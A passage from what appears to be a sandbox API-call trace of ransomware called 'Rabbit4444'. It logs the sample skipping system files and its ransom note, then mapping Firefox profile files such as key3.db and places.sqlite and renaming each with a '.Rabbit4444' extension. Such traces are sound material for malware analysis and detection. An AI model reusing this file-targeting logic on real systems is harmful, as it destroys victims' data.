lstrcmpiW (lpString1="handlers.json", lpString2="NTUSER.DAT") returned -1 [0051.129] lstrcpyW (in: lpString1=0x130ebcc, lpString2="handlers.json" | out: lpString1="handlers.json") returned="handlers.json" [0051.129] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\handlers.json", dwFileAttributes=0x0) returned 1 [0051.129] lstrlenW (lpString="handlers.json") returned 13 [0051.129] lstrlenW (lpString="Rabbit4444") returned 10 [0051.129] lstrcmpiW (lpString1="dlers.json", lpString2="Rabbit4444") returned -1 [0051.129] lstrlenW (lpString=".dll") returned 4 [0051.129] lstrcmpiW (lpString1="json", lpString2=".dll") returned 1 [0051.129] lstrlenW (lpString=".lnk") returned 4 [0051.129] lstrcmpiW (lpString1="json", lpString2=".lnk") returned 1 [0051.129] lstrlenW (lpString=".ini") returned 4 [0051.129] lstrcmpiW (lpString1="json", lpString2=".ini") returned 1 [0051.129] lstrlenW (lpString=".sys") returned 4 [0051.129] lstrcmpiW (lpString1="json", lpString2=".sys") returned 1 [0051.129] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\handlers.json" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\handlers.json"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0051.130] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0051.130] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14244041052) returned 1 [0051.130] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=683) returned 1 [0051.130] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117b30 [0051.130] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101fb8 [0051.130] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x5b0, lpName=0x0) returned 0x298 [0051.131] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5b0) returned 0x70000 [0051.132] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0051.132] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0051.132] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0051.132] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0051.132] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0051.133] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0051.133] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0051.133] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0051.133] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14244357523) returned 1 [0051.133] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117b30 | out: hHeap=0xe0000) returned 1 [0051.133] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101fb8 | out: hHeap=0xe0000) returned 1 [0051.133] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0051.133] CloseHandle (hObject=0x298) returned 1 [0051.133] CloseHandle (hObject=0x278) returned 1 [0051.133] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\handlers.json.Rabbit4444") returned 98 [0051.133] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\handlers.json" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\handlers.json"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\handlers.json.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\handlers.json.rabbit4444"), dwFlags=0x1) returned 1 [0051.134] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfe6922fa, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xfe6922fa, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xb81085d6, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x4000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="key3.db", cAlternateFileName="")) returned 1 [0051.134] lstrcmpiW (lpString1="key3.db", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0051.134] lstrcmpiW (lpString1="key3.db", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0051.134] lstrcmpiW (lpString1="key3.db", lpString2="Rabbit4444.exe") returned -1 [0051.134] lstrcmpiW (lpString1="key3.db", lpString2=".") returned 1 [0051.134] lstrcmpiW (lpString1="key3.db", lpString2="..") returned 1 [0051.134] lstrcmpiW (lpString1="key3.db", lpString2="windows") returned -1 [0051.134] lstrcmpiW (lpString1="key3.db", lpString2="bootmgr") returned 1 [0051.134] lstrcmpiW (lpString1="key3.db", lpString2="pagefile.sys") returned -1 [0051.134] lstrcmpiW (lpString1="key3.db", lpString2="boot") returned 1 [0051.134] lstrcmpiW (lpString1="key3.db", lpString2="ids.txt") returned 1 [0051.134] lstrcmpiW (lpString1="key3.db", lpString2="NTUSER.DAT") returned -1 [0051.134] lstrcpyW (in: lpString1=0x130ebcc, lpString2="key3.db" | out: lpString1="key3.db") returned="key3.db" [0051.134] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\key3.db", dwFileAttributes=0x0) returned 1 [0051.134] lstrlenW (lpString="key3.db") returned 7 [0051.134] lstrlenW (lpString="Rabbit4444") returned 10 [0051.134] lstrcmpiW (lpString1="ꀀ", lpString2="Rabbit4444") returned 1 [0051.134] lstrlenW (lpString=".dll") returned 4 [0051.134] lstrcmpiW (lpString1="3.db", lpString2=".dll") returned 1 [0051.134] lstrlenW (lpString=".lnk") returned 4 [0051.134] lstrcmpiW (lpString1="3.db", lpString2=".lnk") returned 1 [0051.134] lstrlenW (lpString=".ini") returned 4 [0051.134] lstrcmpiW (lpString1="3.db", lpString2=".ini") returned 1 [0051.134] lstrlenW (lpString=".sys") returned 4 [0051.135] lstrcmpiW (lpString1="3.db", lpString2=".sys") returned 1 [0051.135] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\key3.db" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\key3.db"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0051.135] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0051.135] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14244548962) returned 1 [0051.135] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=16384) returned 1 [0051.135] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ba8 [0051.135] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101738 [0051.135] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4300, lpName=0x0) returned 0x298 [0051.136] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4300) returned 0x70000 [0051.138] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0051.138] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0051.138] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0051.138] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0051.138] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0051.138] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0051.138] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0051.138] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0051.138] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14244906941) returned 1 [0051.138] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ba8 | out: hHeap=0xe0000) returned 1 [0051.138] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101738 | out: hHeap=0xe0000) returned 1 [0051.138] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0051.139] CloseHandle (hObject=0x298) returned 1 [0051.139] CloseHandle (hObject=0x278) returned 1 [0051.139] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\key3.db.Rabbit4444") returned 92 [0051.139] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\key3.db" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\key3.db"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\key3.db.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\key3.db.rabbit4444"), dwFlags=0x1) returned 1 [0051.139] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfb00785a, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xfb00785a, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xfb00785a, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="minidumps", cAlternateFileName="MINIDU~1")) returned 1 [0051.139] lstrcmpiW (lpString1="minidumps", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0051.139] lstrcmpiW (lpString1="minidumps", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0051.139] lstrcmpiW (lpString1="minidumps", lpString2="Rabbit4444.exe") returned -1 [0051.139] lstrcmpiW (lpString1="minidumps", lpString2=".") returned 1 [0051.139] lstrcmpiW (lpString1="minidumps", lpString2="..") returned 1 [0051.139] lstrcmpiW (lpString1="minidumps", lpString2="windows") returned -1 [0051.139] lstrcmpiW (lpString1="minidumps", lpString2="bootmgr") returned 1 [0051.139] lstrcmpiW (lpString1="minidumps", lpString2="pagefile.sys") returned -1 [0051.140] lstrcmpiW (lpString1="minidumps", lpString2="boot") returned 1 [0051.140] lstrcmpiW (lpString1="minidumps", lpString2="ids.txt") returned 1 [0051.140] lstrcmpiW (lpString1="minidumps", lpString2="NTUSER.DAT") returned -1 [0051.140] lstrcpyW (in: lpString1=0x130ebcc, lpString2="minidumps" | out: lpString1="minidumps") returned="minidumps" [0051.140] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf64a8 [0051.140] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xa8) returned 0x119158 [0051.140] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf64b0 | out: ListHead=0xf68b0, ListEntry=0xf64b0) returned 0xf6450 [0051.140] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb00785a, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xfb00785a, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x6f2e0a0, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="parent.lock", cAlternateFileName="PARENT~1.LOC")) returned 1 [0051.140] lstrcmpiW (lpString1="parent.lock", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0051.140] lstrcmpiW (lpString1="parent.lock", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0051.140] lstrcmpiW (lpString1="parent.lock", lpString2="Rabbit4444.exe") returned -1 [0051.140] lstrcmpiW (lpString1="parent.lock", lpString2=".") returned 1 [0051.140] lstrcmpiW (lpString1="parent.lock", lpString2="..") returned 1 [0051.140] lstrcmpiW (lpString1="parent.lock", lpString2="windows") returned -1 [0051.140] lstrcmpiW (lpString1="parent.lock", lpString2="bootmgr") returned 1 [0051.140] lstrcmpiW (lpString1="parent.lock", lpString2="pagefile.sys") returned 1 [0051.140] lstrcmpiW (lpString1="parent.lock", lpString2="boot") returned 1 [0051.140] lstrcmpiW (lpString1="parent.lock", lpString2="ids.txt") returned 1 [0051.140] lstrcmpiW (lpString1="parent.lock", lpString2="NTUSER.DAT") returned 1 [0051.140] lstrcpyW (in: lpString1=0x130ebcc, lpString2="parent.lock" | out: lpString1="parent.lock") returned="parent.lock" [0051.140] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\parent.lock", dwFileAttributes=0x0) returned 1 [0051.141] lstrlenW (lpString="parent.lock") returned 11 [0051.141] lstrlenW (lpString="Rabbit4444") returned 10 [0051.141] lstrcmpiW (lpString1="arent.lock", lpString2="Rabbit4444") returned -1 [0051.141] lstrlenW (lpString=".dll") returned 4 [0051.141] lstrcmpiW (lpString1="lock", lpString2=".dll") returned 1 [0051.141] lstrlenW (lpString=".lnk") returned 4 [0051.141] lstrcmpiW (lpString1="lock", lpString2=".lnk") returned 1 [0051.141] lstrlenW (lpString=".ini") returned 4 [0051.141] lstrcmpiW (lpString1="lock", lpString2=".ini") returned 1 [0051.141] lstrlenW (lpString=".sys") returned 4 [0051.141] lstrcmpiW (lpString1="lock", lpString2=".sys") returned 1 [0051.141] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfd67a0d8, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xfd67a0d8, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xfd7d1832, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x18000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="permissions.sqlite", cAlternateFileName="PERMIS~1.SQL")) returned 1 [0051.141] lstrcmpiW (lpString1="permissions.sqlite", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0051.141] lstrcmpiW (lpString1="permissions.sqlite", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0051.141] lstrcmpiW (lpString1="permissions.sqlite", lpString2="Rabbit4444.exe") returned -1 [0051.141] lstrcmpiW (lpString1="permissions.sqlite", lpString2=".") returned 1 [0051.141] lstrcmpiW (lpString1="permissions.sqlite", lpString2="..") returned 1 [0051.141] lstrcmpiW (lpString1="permissions.sqlite", lpString2="windows") returned -1 [0051.141] lstrcmpiW (lpString1="permissions.sqlite", lpString2="bootmgr") returned 1 [0051.141] lstrcmpiW (lpString1="permissions.sqlite", lpString2="pagefile.sys") returned 1 [0051.141] lstrcmpiW (lpString1="permissions.sqlite", lpString2="boot") returned 1 [0051.141] lstrcmpiW (lpString1="permissions.sqlite", lpString2="ids.txt") returned 1 [0051.141] lstrcmpiW (lpString1="permissions.sqlite", lpString2="NTUSER.DAT") returned 1 [0051.142] lstrcpyW (in: lpString1=0x130ebcc, lpString2="permissions.sqlite" | out: lpString1="permissions.sqlite") returned="permissions.sqlite" [0051.142] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\permissions.sqlite", dwFileAttributes=0x0) returned 1 [0051.142] lstrlenW (lpString="permissions.sqlite") returned 18 [0051.142] lstrlenW (lpString="Rabbit4444") returned 10 [0051.142] lstrcmpiW (lpString1="ons.sqlite", lpString2="Rabbit4444") returned -1 [0051.142] lstrlenW (lpString=".dll") returned 4 [0051.142] lstrcmpiW (lpString1="lite", lpString2=".dll") returned 1 [0051.142] lstrlenW (lpString=".lnk") returned 4 [0051.142] lstrcmpiW (lpString1="lite", lpString2=".lnk") returned 1 [0051.143] lstrlenW (lpString=".ini") returned 4 [0051.143] lstrcmpiW (lpString1="lite", lpString2=".ini") returned 1 [0051.143] lstrlenW (lpString=".sys") returned 4 [0051.143] lstrcmpiW (lpString1="lite", lpString2=".sys") returned 1 [0051.143] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\permissions.sqlite" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\permissions.sqlite"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0051.143] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0051.143] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14245357914) returned 1 [0051.143] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=98304) returned 1 [0051.143] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117a40 [0051.143] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101d10 [0051.143] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x18300, lpName=0x0) returned 0x298 [0051.145] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x18300) returned 0x70000 [0051.150] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0051.150] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109028 [0051.150] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0051.150] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0051.150] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0051.150] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0051.150] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0051.150] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109028 | out: hHeap=0xe0000) returned 1 [0051.150] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14246109928) returned 1 [0051.150] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117a40 | out: hHeap=0xe0000) returned 1 [0051.150] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101d10 | out: hHeap=0xe0000) returned 1 [0051.150] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0051.151] CloseHandle (hObject=0x298) returned 1 [0051.151] CloseHandle (hObject=0x278) returned 1 [0051.152] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\permissions.sqlite.Rabbit4444") returned 103 [0051.152] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\permissions.sqlite" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\permissions.sqlite"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\permissions.sqlite.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\permissions.sqlite.rabbit4444"), dwFlags=0x1) returned 1 [0051.152] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfdd54ecc, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xfdd54ecc, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x42fefdeb, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x500000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="places.sqlite", cAlternateFileName="PLACES~1.SQL")) returned 1 [0051.152] lstrcmpiW (lpString1="places.sqlite", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0051.152] lstrcmpiW (lpString1="places.sqlite", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0051.152] lstrcmpiW (lpString1="places.sqlite", lpString2="Rabbit4444.exe") returned -1 [0051.152] lstrcmpiW (lpString1="places.sqlite", lpString2=".") returned 1 [0051.152] lstrcmpiW (lpString1="places.sqlite", lpString2="..") returned 1 [0051.152] lstrcmpiW (lpString1="places.sqlite", lpString2="windows") returned -1 [0051.152] lstrcmpiW (lpString1="places.sqlite", lpString2="bootmgr") returned 1 [0051.152] lstrcmpiW (lpString1="places.sqlite", lpString2="pagefile.sys") returned 1 [0051.152] lstrcmpiW (lpString1="places.sqlite", lpString2="boot") returned 1 [0051.152] lstrcmpiW (lpString1="places.sqlite", lpString2="ids.txt") returned 1 [0051.152] lstrcmpiW (lpString1="places.sqlite", lpString2="NTUSER.DAT") returned 1 [0051.152] lstrcpyW (in: lpString1=0x130ebcc, lpString2="places.sqlite" | out: lpString1="places.sqlite") returned="places.sqlite" [0051.152] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\places.sqlite", dwFileAttributes=0x0) returned 1 [0051.153] lstrlenW (lpString="places.sqlite") returned 13 [0051.153] lstrlenW (lpString="Rabbit4444") returned 10 [0051.153] lstrcmpiW (lpString1="ces.sqlite", lpString2="Rabbit4444") returned -1 [0051.153] lstrlenW (lpString=".dll") returned 4 [0051.153] lstrcmpiW (lpString1="lite", lpString2=".dll") returned 1 [0051.153] lstrlenW (lpString=".lnk") returned 4 [0051.153] lstrcmpiW (lpString1="lite", lpString2=".lnk") returned 1 [0051.153] lstrlenW (lpString=".ini") returned 4 [0051.153] lstrcmpiW (lpString1="lite", lpString2=".ini") returned 1 [0051.153] lstrlenW (lpString=".sys") returned 4 [0051.153] lstrcmpiW (lpString1="lite", lpString2=".sys") returned 1 [0051.153] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\places.sqlite" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\places.sqlite"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0051.153] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0051.153] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14246390066) returned 1 [0051.153] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=5242880) returned 1 [0051.153] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1176f8 [0051.153] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101b78 [0051.153] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x500300, lpName=0x0) returned 0x298 [0051.154] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x400000, dwNumberOfBytesToMap=0x100300) returned 0x1090000 [0051.185] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x200000) returned 0x2c20000 [0051.305] UnmapViewOfFile (lpBaseAddress=0x2c20000) returned 1 [0051.324] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x200000, dwNumberOfBytesToMap=0x200000) returned 0x2c20000 [0051.385] UnmapViewOfFile (lpBaseAddress=0x2c20000) returned 1 [0051.419] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0051.419] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0051.419] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0051.419] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0051.419] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0051.420] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0051.420] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0051.420] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0051.420] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14273047719) returned 1 [0051.420] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1176f8 | out: hHeap=0xe0000) returned 1 [0051.420] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101b78 | out: hHeap=0xe0000) returned 1 [0051.420] UnmapViewOfFile (lpBaseAddress=0x1090000) returned 1 [0051.430] CloseHandle (hObject=0x298) returned 1 [0051.430] CloseHandle (hObject=0x278) returned 1 [0051.430] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\places.sqlite.Rabbit4444") returned 98 [0051.430] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\places.sqlite" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\places.sqlite"), 